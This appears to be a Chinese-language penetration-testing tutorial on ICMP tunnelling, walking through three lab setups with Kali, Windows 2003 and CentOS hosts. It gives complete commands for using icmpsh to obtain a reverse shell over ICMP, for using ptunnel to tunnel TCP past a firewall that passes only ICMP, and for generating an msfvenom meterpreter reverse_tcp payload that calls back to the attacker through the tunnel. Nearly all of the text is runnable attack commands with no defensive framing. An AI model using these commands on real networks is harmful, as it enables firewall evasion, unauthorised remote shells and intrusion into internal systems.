内网渗透时,如果防火墙只允许ICMP流量通过,可以使用ICMP隧道技术。
缺点:需要root/administrator权限。
环境一
kali通过icmp隧道获得2003的shell
- kali,192.168.1.104
- 2003,192.168.1.105
- kali上执行
git clone https://github.com/inquisb/icmpsh.git
apt-get install python-impacket
sysctl -w net.ipv4.icmp_echo_ignore_all=1
python icmpsh_m.py 192.168.1.104 192.168.1.105
- 2003上执行
icmpsh.exe -t 192.168.1.104 -d 500 -b 30 -s 128
- kali获得2003的shell
环境二
使用kali访问2003的web服务,ptunnel下载地址:
https://pkgs.org/download/ptunnel
- kali,192.168.1.104
- 2003,192.168.10.134
- centos,192.168.1.102和192.168.10.136
- centos上执行
rpm -ivh ptunnel-0.70-1.el6.rf.i686.rpm 安装ptunnel
sysctl -w net.ipv4.icmp_echo_ignore_all=1
ptunnel -x 123 开启icmp隧道服务端,密码123
- kali上执行
-p 指定icmp隧道服务端ip
-lp 指定本地转发端口
-da 指定要访问的机器ip
-dp 指定要访问的机器端口
ptunnel -p 192.168.1.102 -lp 1080 -da 192.168.10.134 -dp 80 -x 123
此时,访问kali的1080端口,相当于访问2003的80端口。
image.png环境三
将2003的shell反弹到kali上
- kali,192.168.1.104
- 2003,192.168.10.134
- centos,192.168.1.102和192.168.10.136
- kali上执行
ptunnel -x 123
- centos上执行
ptunnel -p 192.168.1.104 -lp 1080 -da 192.168.1.104 -dp 4444 -x 123
- kali上生成shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.136 LPORT=1080 -f exe > shell.exe
在2003上执行shell.exe,kali成功接收到2003的shell
image.png
网友评论